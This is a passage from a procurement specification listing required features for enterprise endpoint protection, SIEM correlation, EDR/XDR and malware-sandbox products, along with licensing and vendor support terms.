administration server, in order to reduce the network load on the main
administration server system.

32. The proposed solution must be able to generate graphical reports for
anti-malware software events, and data about the hardware and
software inventory, licensing, etc.

33. The proposed solution must be able to export of reports to PDF and
XML files.

34. The proposed solution must provide the centralized administration of


backup storages and quarantine on all network resources where the
anti-malware software is installed.

35. The proposed solution must provide the creation of internal accounts to
authenticate administrators on the administration server.

36. The proposed solution must provide the creation of an administration


system backup copy with the help of integrated administration system
tools.

37. The proposed solution must support Windows Failover Cluster.

38. The proposed solution must have a built-in clustering feature.

39. The proposed solution must include some form of system to control
virus epidemics.

40. The proposed solution must include Role Based Access Control
(RBAC), and this must allow restrictions to be replicated throughout the
management servers in the hierarchy.

41. The proposed solution’s management server must include pre-defined


security roles for the Auditor, Supervisor and Security Officer.

42. The proposed solution must have ability manage mobile devices
through remote commands.

43. The proposed solution must have ability to delete downloaded updates.

44. The proposed solution must generate Managing Administration Server


updates from the application interface.

45. The proposed solution must enable the selection of an update agent for
client computers based on a network analysis.

46. The proposed solution must clearly show information about the
distribution of vulnerabilities across managed computers.

47. The proposed solution’s management server interface must support the
Arabic language.

48. The proposed solution’s management server must maintain a revision


history of the policies, tasks, packages, management groups created,
so that modifications to a particular policy/task can be reviewed.
49. The proposed solution’s management server must have functionality to
create multiple profiles within a protection policy with different protection
settings that can be simultaneously active on a single/multiple devices
based on the following activation rules:
 Device status
 Tags
 Active directory
 Device owners
 Hardware

50. The proposed solution must support following notification delivery


channels:
 Email
 Syslog
 SMS
 SIEM

51. The proposed solution must have the ability to define an IP address
range, to limit client traffic towards the management server based on
time and speed.

52. The proposed solution must have the ability to perform inventory on
scripts and .dll files.

53. The proposed solution must have the ability to tag/mark computers
based on:
 Network Attributes
o Name
o Domain and/or Domain Suffix
o IP address
o IP address to management server
 Location in Active Directory
o Organizational Unit
o Group
 Operating System
o Type and Version
o Architecture
o Service Pack number
 Virtual Architecture
 Application registry
o Application name
o Application version
o Manufacturer

54. The proposed solution must have the ability to create/define settings
based on a computer’s location in the network, rather than the group to
which it belongs in the management server.

55. The proposed solution must have the functionality to add a


unidirectional connection mediator between the management server
and the endpoint connecting over the internet/public network.

56. The proposed solution must allow the administrator to define restricted
settings in policy/profile settings, so that a virus scan task can be
triggered automatically when a certain number of viruses are detected
over defined amount of time. The values for the number of viruses and
timescale must be configurable.

57. The proposed solution must have a customizable dashboard generating


and displaying real time statistics for endpoints.

58. The proposed solution must allow the administrator to customize


reports.

59. The proposed solution must have the functionality to detect non-
persistent virtual machines and automatically delete them and their
related data from the management server when powered off.

60. The proposed solution must enable the administrator to set a period
after which a computer not connected to the management server, and
its related data are automatically deleted from the server.

61. The proposed solution must allow the administrator to create


categories/groups of application based on:
 Application Name
 Application Path
 Application Metadata
 Application Digital certificate
 Vendor pre-defined application categories
 SHA
 Reference computers
to allow/deny their execution on endpoints.

62. The proposed solution must allow the administrator to define different
status change conditions for groups of endpoints in the management
server.

63. The proposed solution must allow the administrator to add custom/3rd
party endpoint management tools into the management server.

64. The proposed solution must have a built-in feature/module to remotely


collect the data needed for troubleshooting from the endpoints, without
requiring physical access.

65. The proposed solution must allow the administrator to create a


Connection Tunnel between a remote client device and the
management server if the port used for connection to the management
server is not available on the device.

66. Suggest solution must have built-in functionality to remotely connect to


the endpoint using Windows Desktop Sharing Technology. In addition,
the solution must be able to maintain the auditing of administrator
actions during the session.

67. The proposed solution must have a feature to create a structure of


administration groups using the Groups hierarchy, based on the
following data:

 structures of Windows domains and workgroups


 structures of Active Directory groups
 contents of a text file created by the administrator manually

68. The proposed solution must be able to retrieve information about the
equipment detected during a network poll. The resulting inventory
should cover all equipment connected to the organization's network.
Information about the equipment should update after each new network
poll. The list of detected equipment should cover the following:
 devices
 mobile devices
 network devices
 virtual devices
 OEM components
 computer peripherals
 connected devices
 VoIP phones
 network repositories
The administrator must be able to add new devices to the equipment list
manually or edit information about equipment that already exists on the
network.
‘Device is Written Off’ functionality must be available, so that such
devices are not displayed in the equipment list.

69. The proposed solution must incorporate a single distribution/relay agent


to support at least 10,000 endpoints for the delivery of protection,
updates, patches, and installation packages to remote sites.

70. The proposed solution must incorporate a single distribution/relay agent


to relay/transfer or proxy threat reputation requests from endpoints to
the management server.

71. The proposed solution must support the download of differential files
rather than full update packages.

72. The proposed solution must support OPEN API and include guidelines
for integration with 3rd party external systems.

73. The proposed solution must include a built-in tool to perform remote
diagnostics and collect troubleshooting logs without requiring physical
access to the computer.

74. The proposed solution must include Role Based Access Control
(RBAC) with customizable predefined roles.

75. The proposed solution’s primary/parent management server must be


able to relay updates and cloud reputation services.

76. The proposed solution’s reports must include information about each
threat and the technology that detected it.

77. The proposed solution report must include details about which endpoint
protection components are, or are not, installed on client devices,
regardless of the protection profile applied/existing for these devices.

78. The proposed solution’s primary management server must be able to


retrieve detailed information reporting on the health status etc. of
managed endpoints from the secondary management servers.

79. The proposed solution must include the option for the customer to either
deploy an on-premises management console or use the vendor-
provided cloud-based management console.

80. The proposed solution must be able to integrate with the vendor’s
cloud-based management console for endpoint management at no
additional cost.

81. The proposed solution must enable swift migration from the on-
premises management console to the vendor cloud-based management
console.

82. The proposed solution’s agent must include support for cloud-based
deployment via:
 Amazon Web Services
 Microsoft Azure

83. The proposed solution must provide anti-malware database update


mechanisms including:
 Multiple ways of updating, including global communication
channels over the HTTPS protocol, shared resource at local
network and removable media.
 Verification of the integrity and authenticity of updates by
means of an electronic digital signature.

84. The proposed solution must support Single Sign On (SSO) using NTLM
and Kerberos.

85. The proposed solution must allow to monitor vulnerabilities that exist on
managed devices

86. The proposed solution should allow to detect and root out advanced
attacks, perform root cause analysis with a visualized threat
development chain graph, and drill down to details for further review.

Architecture and design (Correlation engine)

1. Collection, normalization, aggregation, filtration, enrichment, mutation,


correlation, and storage of security events.

2. Integration with different log formats, with the ability to create user
custom normalizers (parsers).

3. Real-time monitoring, analysis, and correlation of security events.

4. Retroscan (the historical correlation) of security events.

5. Automated enrichment of security events, which must be available on


collector and correlator components with the following actionable
information:
 Threat intelligence data feeds.
 Threat intelligence lookup services.
 Information about assets and infrastructure.
 Information about software vulnerabilities and software installed
on endpoints.
 Information about users (accounts) from Microsoft® Active
Directory.
 Information about FQDN or IP from DNS system.
Information from user-created dictionaries.

6. A web-based user interface for central management, incident


investigation and response.

7. SQL-like event search with auto-complete.

8. Encrypted secure communications between all components.

9. Virtual environment and bare-metal deployment options

10. Deployment in a distributed IT infrastructure.

11. Multitenancy.

12. Role-based access control.

13. Customizable dashboards and reports.

14. Automated asset discovery and inventory, with or without agent


software.

15. A microservice software architecture.

16. The solution must support the ability to write the log of the installation
process to a file

17. Collection, normalization, aggregation, filtration, enrichment, mutation,


correlation, and storage of security events.

18. Integration with different log formats, with the ability to create user
custom normalizers (parsers).

Functional requirements (Correlation engine)

1. The solution must support raw data collection. This must be a


configurable option, which can be configured independently for each
data source

2. The solution must support both active and passive log collection
mechanisms from different types of equipment and systems

3. The solution must support normalization into a unified data model to


standardize events. The data model must be documented.

4. The solution must support the following log formats (i.e., normalizers,
parsers) ‘out-of-the-box’:
 JSON
 CEF (Common Event Format)
 Regexp (Regular Expression)
 Syslog (as per RFC3164 and RFC5424)
 CSV (with custom delimiter)
 Key-value
 XML
 NetFlow v5
 NetFlow v9
 Sflow5
 Ipfix
 SQL

5. The solution must support the following log transport mechanisms (i.e.,
connectors) ‘out-of-the-box’:
 Internal
 TCP
 UDP
 Netflow
 Sflow
 NATS-jetstream
 Kafka
 HTTP
 SQL (MSSQL, MySQL, PostgreSQL, CockroachDB, SQLite3,
Oracle, Firebird)
 File
 1C-log
 1C-xml
 Diode
 FTP
 NFS
 WMI (remote Windows Event Log collection)
 WEC (local Windows Event Log collection)
 SNMP
 SNMP-trap
 KATA/KEDR
 VMware

6. The solution must support custom parser creation and modification via
a graphical web interface. The creation and modification of custom
parsers should not require any programming skills, or the mandatory
involvement of the solution vendor.

7. Custom parser creation must include highlighting the log example (at
least for regex parsers) and fields mapping.

8. The solution must support two or more levels of additional parsers

9. The solution must support a graphical view of parser structure (tree


structure).

10. All parsers and connectors provided by the vendor, and those created
by the user, must be editable and open to modification

11. The solution must support secure encrypted communications channels


with data sources for data collection purposes (where data sources
support this functionality).

12. The solution must operate for an unlimited number of data sources.
13. The solution must support data sources monitoring, and notification in
the case of low EPS (Events Per Second).

14. The solution must support automatic updating of normalizers via the
Internet and via an update mirror.

15. The solution must support the ability to convert hex, base64,
baseful64url binary values at the event collection stage.

16. The solution must support the selection of several conditions for
switching between different levels of parsers.

17. The solution must support the ability to send events to third party
systems in CEF format

18. The solution must support sending all raw events for additional
normalization

19. The solution must support the ability to collect events of different
formats by a single collector

20. The solution must support the ability to create custom fields in
normalizers

21. The solution must support the ability to send test events to the system

22. The solution must support configuration backup options.

23. The solution must support restoring the configuration from a backup
and importing/exporting the configuration parameters.

Architecture and design (EDR Server and EDR agents)

1. EDR solution must be fully integrated with the XDR solution.

2. XDR solution must have unified console for administrators and analysts

3. EDR agent must have integration with Endpoint Protection application


(Single agent).

4. EDR should support standalone agent installation (without Endpoint


Protection application).

5. The solution must support VMware ESXi and KVM environment


installation

6. Solution must support collecting, processing, and analyzing endpoint


telemetry from the following types of operating systems: Windows,
Linux, MacOS

7. The list of supported Linux distributions must include at least: Ubuntu,


Red Hat Enterprise Linux, CentOS, Debian, Oracle, SUSE Linux
Enterprise Server, Amazon Linux, EulerOS.

8. Solution must support multi-tenancy scenario with multiple Analysis


Centers connected to a Master Analysis Centre.
9. The solution must support aggregating and analyzing information from
up to 450,000 endpoints.

10. The solution must support distributed implementation schema with


centralized management (multiple Analysis Centers with single
administration point).

11. The solution must support high-availability architecture for Analysis


Centers.

12. The solution must provide web interface for management and analytics
(Incident related data, System status and health check data, Settings,
etc.).

13. The solution must provide API at least for following proposals:
 API to execute remediation/response actions on endpoints.
 API for tagged endpoint telemetry retrieval by 3rd party systems.
API for application alert information retrieval by 3rd party systems

14. Solution must provide an option to store endpoint telemetry data for a
necessary period (30 days or more). Local storage must be extendable
if required to accommodate data.

Functional requirements (EDR Server and EDR agents)

1. The solution must be able to use vendor’s cloud-based Threat


Intelligence services to obtain reputation of objects, remote hostnames,
and IPs; check binary objects certificates information and more.

2. Vendor must be able to provide full private replica of cloud Threat


Intelligence services to be installed on premise if necessary.

3. Private Threat Intelligence cloud must have an option to add/redefine


objects and web resources custom reputation data.

4. Private Threat Intelligence cloud used must support data diode


(unidirectional gateway) scenario for reputation data and other types of
information updates

5. Reputation data in on premise Threat Intelligence services must be


automatically updated with the analytical information obtained from the
solution. This allows to enrich threat data on all solutions connected to
local replica of Threat Intelligence services

6. The investigative functions must include a historical data of primary


endpoint events (telemetry) to determine the changes occurred

7. Solution user (security analyst) must have an automated tool to obtain a


list of files stored in a specified folder on an endpoint, list of processes
running on a given endpoint, process memory dump, full memory dump,
disk image, registry keys, NTFS metafiles and autorun points list

8. Endpoint telemetry data must contain information about account


activities, network communications, file system changes, file attributes
modifications, registry changes, interactive input data, windows event
log information, Linux properties information, among other types of
data.

9. The solution must provide visibility into where else in your organization
particular threats (objects) may exist.

10. The solution must be able to detect advanced malware, also it must
discover zero-day malware that signature-based solutions miss

11. Solution should support alerts data and monitoring information delivery
via syslog

12. The solution should use include Automated Malware Analysis


subsystem to detonate suspicious objects within controlled virtual
environment to assess their threat level.

13. The solution Automated Malware Analysis subsystem must use multiple
virtual client operating systems of x64 and x86 architectures. The list
must contain at least the following: Windows 10, Windows 7 64 bit,
Windows XP 32 bit, CentOS 7.8 64 bit

14. The solution Automated Malware Analysis subsystem must provide an


ability to prepare and use customized VM images for dynamic malware
analysis

15. Automated Malware Analysis subsystem must have ability to provide


the following information to analyst:
 Comprehensive Host Modification Report available after
execution in VM
 Copy of malware binary(s)
 network metadata identifying the locations to which the malware
attempts to communicate.
 Importance of information
screenshots of the desktop activity

16. The solution Automated Malware Analysis subsystem must provide


output to analyst which includes the following: graphical representation
of processes tree, data on web traffic and DNS communications, and
more

17. Automated Malware Analysis subsystem must have an option to use


dedicated Internet connection to enable analysis of outgoing
communications and downloaded extra malicious modules.

18. Automated Malware Analysis subsystem must be able to simulate end


user actions to force the execution of malware that rely on triggers from
the end user, like a mouse click for a better analysis of the malware
objects.

19. The solution Automated Malware Analysis subsystem must be able to


hide itself from sandbox-evading malware during object analysis.

20. The solution Automated Malware Analysis subsystem must be able to


process objects manually submitted via solution management interface

21. Verdicts obtained via Automated Malware Analysis subsystem must


enrich local reputation database used by EDR solution, ATP solution,
Endpoint Protection applications

22. Endpoint Protection solution detects must provide additional information


to telemetry database for EDR solution and this data must be
searchable via analyst console.

23. EDR solution agent must have self-defense functionality to protect from
its removal

24. The solution must have the capability to run IOC scan inside centralized
collected endpoint telemetry database.

25. The solution must have the capability to force run IOC scan across all
hosts with installed agents.

26. EDR Solution should provide the ability to execute YARA scans on
endpoints

27. EDR solution must provide search interface with rich functionality for
analyst to build sophisticated lookup requests against telemetry
database.

28. EDR solution must provide means of isolating machine from the rest of
the network in case of emergency, while preserving controlled
communication with agents’ administration and control server.

29. EDR solution must provide means of remote remediation via agent (files
deletion and quarantine, process kill, preventing files from
running/opening, etc.)

30. The solution must have integration with Threat Intelligence analytical
portal which contains not only reputation data, but also connections
between internet resources, objects, etc.

31. The solution must be capable to detect incoming or outgoing


connections to C&C infrastructure.

32. Alerts on detections must be automatically enriched with relevant


context data such as descriptions, classes of threats, geographical
prevalence, etc.

33. The solution should provide the ability to tag critical resources that
could be protected using different rules

34. The solution Automated Malware Analysis subsystem should be able to


examine objects using multiple subsystem servers’ instances to
improve analysis time

35. Multiple Analysis Centers should be able to connect to a single


Automated Malware Analysis subsystem

36. Objects detected by Malware Analysis subsystem must be


automatically prevented from running on protected endpoints if
required.

37. Suspicious actions detected by Automated Malware Analysis


subsystem should be matched to TTPs from MITRE ATT&CK Matrix

38. Alerts and events from endpoint sensors should be matched to TTPs
from MITRE ATT&CK Matrix

39. The solution must be able to take inputs for custom indicators of
compromise (IOC) and indicators of attack (IOA) for classifying and
analyzing events.

40. Solution must provide actionable guidance on how to respond in a


relevant manner to registered alerts.

Administration & Reporting (EDR Server and EDR agents)

1. The solution must have a unified policies, centralized reporting, and


tasks execution within a Single console for centralized management.

2. The solution must provide analytics and visualizations capabilities and


detect/combat advanced internal/external threats

3. The solution must be able to provide a complete malware analysis


report in less than 10 minutes from the moment the object was sent to
Automated Malware Analysis subsystem.

4. The solution must have the ability to create daily, weekly, and monthly
executive reports and allow reports export.

5. The solution must be able to utilize a proxy server with authentication to


download software updates.

6. Solution should be able to integrate with XDR.

7. The solution must have different administrators functions that have a


single interface/dashboard during sign on and controlled by privileges
and rights based on their functions (Administrator, Reviewer,
Investigator, etc.).

8. The solution must utilize a secure channel for the communication


between the console and administrator. It should also allow the import
of the digital certificate used for securing the communication channel.

9. The solution must utilize a secure channel for the communication


between the console and administrator. It should also allow the import
of the digital certificate used for securing the communication channel.

10. The solution must allow the synchronization of time with NTP server.

11. The solution must allow the creation of accounts with different roles
used to administer the solution, process the alerts, audit other actions,
or review changes

12. Analysis Centre upgrade must not require installation from scratch and
losing settings, incidents database, etc.

13. The solution must have customizable reports based on information on


alerts
14. The solution should be able to send email notifications when certain
types of security alerts are generated.

15. The solution should be able to send email notifications when


operational problems with certain system components are detected
(incl. running out of storage)

16. The solution should provide number of customizable dashboards to


provide insights into systems activity and analytical results, including
system health and activity, queue lengths, events registered, their
status and the technologies used to provide verdicts, lists of the IPs,
domains, and emails most frequently related to incidents

17. The solution must support backup and restore.


Backup must contain at least: alerts databases, whitelists, notifications,
etc.

18. Actions of solution users must be logged both in local activity log and
remotely.

Licensing requirement

1. The solution must allow the EPS license limit to be exceeded in


exceptional circumstances without blocking major functionality (data
collection, processing, storage, alerting and notifications).

2. The solution must calculate the EPS licensing limit based on the daily
average EPS, not a peak EPS rate.

3. The solution must support a licensing option for unlimited *flow


(NetFlow, sFlow, etc.) events.

4. Licensing should allow the deployment of an unlimited number of any


solution components (agents, collectors, correlators, storages) with no
additional charge (limited only by the overall EPS license limit).

Technical support and documentation

1. Requirements for solution documentation. Documentation for all anti-


malware software, including administration tools, should include the
following documents:
Online Help for Administrators
Online Help for implementation best practices
Online Help for hardening of administration servers

2. The anti-malware software documentation provided should describe in


detail the processes of installation, configuration, and use of the anti-
malware software.

3. Solution must include Vendor technical support and a dedicated


manager provided by the Vendor.

4. Technical support must offer a choice of two or more different support


levels.
5. Technical support must include:
 Remote connectivity between the customer and the vendor’s
support specialists for problem-solving.
 Recommendations on solution optimization.
 Product updates.
 Personal technical manager.
Regular reporting on incidents handled by the vendor against the SLA

6. Technical support must include custom parsers (at least 10 types) for
data sources not supported by solution ‘out-of-the-box’.

You might also like